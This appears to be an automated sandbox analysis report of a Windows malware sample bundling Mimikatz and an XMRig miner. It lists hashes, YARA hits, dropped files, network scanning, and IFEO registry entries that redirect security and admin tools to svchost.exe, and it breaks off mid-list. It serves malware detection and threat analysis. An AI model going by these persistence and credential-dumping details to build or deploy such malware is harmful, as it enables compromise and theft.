Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-11-2024 01:23
Behavioral task
behavioral1
Sample
2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe
-
Size
8.2MB
-
MD5
a7e05913d3c0db0c3cb3f7f115b48ed3
-
SHA1
48760772dfafb17cf679c7b6bef1075213f020ab
-
SHA256
b1bc7098e679aeaa8a8938c5da6e366528880bacf2b08717570e4f3f75858bf3
-
SHA512
ac6b8727bc74f24def426f784f3947dfb5cdfc90b1b449946ddcb3ad3d3883528370142f609c6c82f9445b1190551faefe8ad55e3c44e0f3ddef4ac5bc45b291
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4188 created 1808 4188 jbebikp.exe 36 -
Xmrig family
-
Contacts a large (27556) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/1400-177-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-179-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-196-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-209-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-218-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-231-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-251-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-258-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-267-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-376-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-377-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig behavioral2/memory/1400-380-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3064-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3064-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x0007000000023ca2-6.dat mimikatz behavioral2/memory/4444-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/856-138-0x00007FF63C770000-0x00007FF63C85E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts jbebikp.exe File opened for modification C:\Windows\system32\drivers\etc\hosts jbebikp.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbebikp.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2448 netsh.exe 4512 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 4444 jbebikp.exe 4188 jbebikp.exe 4360 wpcap.exe 3896 zpviuibgv.exe 856 vfshost.exe 896 bmgumyclb.exe 2240 xohudmc.exe 2924 ewqksq.exe 1400 ctittb.exe 1568 bmgumyclb.exe 2968 bmgumyclb.exe 3972 bmgumyclb.exe 2216 bmgumyclb.exe 3800 bmgumyclb.exe 3304 bmgumyclb.exe 3936 bmgumyclb.exe 804 bmgumyclb.exe 344 bmgumyclb.exe 400 bmgumyclb.exe 4016 bmgumyclb.exe 2728 bmgumyclb.exe 624 bmgumyclb.exe 3316 bmgumyclb.exe 4832 jbebikp.exe 2376 bmgumyclb.exe 2196 bmgumyclb.exe 3492 bmgumyclb.exe 3928 iubvuzbtm.exe 6548 jbebikp.exe -
Loads dropped DLL 12 IoCs
pid Process 4360 wpcap.exe 4360 wpcap.exe 4360 wpcap.exe 4360 wpcap.exe 4360 wpcap.exe 4360 wpcap.exe 4360 wpcap.exe 4360 wpcap.exe 4360 wpcap.exe 3896 zpviuibgv.exe 3896 zpviuibgv.exe 3896 zpviuibgv.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 81 ifconfig.me 82 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE jbebikp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies jbebikp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache jbebikp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content jbebikp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF jbebikp.exe File created C:\Windows\SysWOW64\ewqksq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\ewqksq.exe xohudmc.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft jbebikp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 jbebikp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF jbebikp.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 jbebikp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData jbebikp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 jbebikp.exe -
resource yara_rule behavioral2/files/0x0007000000023cf4-134.dat upx behavioral2/memory/856-135-0x00007FF63C770000-0x00007FF63C85E000-memory.dmp upx behavioral2/memory/856-138-0x00007FF63C770000-0x00007FF63C85E000-memory.dmp upx behavioral2/files/0x0007000000023cfc-141.dat upx behavioral2/memory/896-142-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/896-145-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/files/0x0007000000023cfe-162.dat upx behavioral2/memory/1400-163-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/1568-171-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/2968-175-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/1400-177-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/1400-179-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/3972-181-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/2216-185-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/3800-189-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/3304-193-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/1400-196-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/3936-198-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/804-202-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/344-206-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/1400-209-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/400-211-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/4016-216-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/1400-218-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/2728-221-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/624-225-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/3316-229-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/1400-231-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/2376-235-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/2196-237-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/3492-249-0x00007FF6013B0000-0x00007FF60140B000-memory.dmp upx behavioral2/memory/1400-251-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/1400-258-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/1400-267-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/1400-376-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/1400-377-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx behavioral2/memory/1400-380-0x00007FF6FF550000-0x00007FF6FF670000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\luzcwvvny\UnattendGC\specials\posh-0.dll jbebikp.exe File created C:\Windows\tmbllbvl\svschost.xml jbebikp.exe File created C:\Windows\luzcwvvny\bmzbiruiz\Packet.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\tibe-2.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\ucl.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\vimpcsvc.exe jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\schoedcl.exe jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\vimpcsvc.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\libeay32.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\libxml2.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\xdvl-0.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\vimpcsvc.xml jbebikp.exe File created C:\Windows\ime\jbebikp.exe jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\exma-1.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\AppCapture64.dll jbebikp.exe File created C:\Windows\luzcwvvny\Corporate\mimilib.dll jbebikp.exe File created C:\Windows\luzcwvvny\upbdrjv\swrpwe.exe jbebikp.exe File created C:\Windows\luzcwvvny\bmzbiruiz\ip.txt jbebikp.exe File created C:\Windows\luzcwvvny\bmzbiruiz\wpcap.exe jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\spoolsrv.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\schoedcl.xml jbebikp.exe File created C:\Windows\luzcwvvny\Corporate\mimidrv.sys jbebikp.exe File created C:\Windows\luzcwvvny\bmzbiruiz\iubvuzbtm.exe jbebikp.exe File created C:\Windows\tmbllbvl\docmicfg.xml jbebikp.exe File opened for modification C:\Windows\tmbllbvl\svschost.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\docmicfg.xml jbebikp.exe File opened for modification C:\Windows\tmbllbvl\spoolsrv.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\zlib1.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\svschost.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\schoedcl.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\AppCapture32.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\crli-0.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\trfo-2.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\spoolsrv.exe jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\spoolsrv.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\ssleay32.dll jbebikp.exe File created C:\Windows\tmbllbvl\vimpcsvc.xml jbebikp.exe File opened for modification C:\Windows\tmbllbvl\vimpcsvc.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\docmicfg.exe jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\coli-0.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\svschost.exe jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\svschost.xml jbebikp.exe File created C:\Windows\luzcwvvny\bmzbiruiz\scan.bat jbebikp.exe File opened for modification C:\Windows\luzcwvvny\bmzbiruiz\Packet.dll jbebikp.exe File opened for modification C:\Windows\tmbllbvl\docmicfg.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\trch-1.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\tucl-1.dll jbebikp.exe File created C:\Windows\tmbllbvl\spoolsrv.xml jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\Shellcode.ini jbebikp.exe File opened for modification C:\Windows\luzcwvvny\bmzbiruiz\Result.txt iubvuzbtm.exe File created C:\Windows\luzcwvvny\bmzbiruiz\zpviuibgv.exe jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\docmicfg.xml jbebikp.exe File created C:\Windows\tmbllbvl\schoedcl.xml jbebikp.exe File created C:\Windows\luzcwvvny\Corporate\vfshost.exe jbebikp.exe File opened for modification C:\Windows\luzcwvvny\Corporate\log.txt cmd.exe File opened for modification C:\Windows\tmbllbvl\jbebikp.exe 2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe File created C:\Windows\luzcwvvny\bmzbiruiz\wpcap.dll jbebikp.exe File created C:\Windows\luzcwvvny\UnattendGC\specials\cnli-1.dll jbebikp.exe File opened for modification C:\Windows\tmbllbvl\schoedcl.xml jbebikp.exe File created C:\Windows\tmbllbvl\jbebikp.exe 2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3856 sc.exe 4420 sc.exe 1228 sc.exe 1552 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 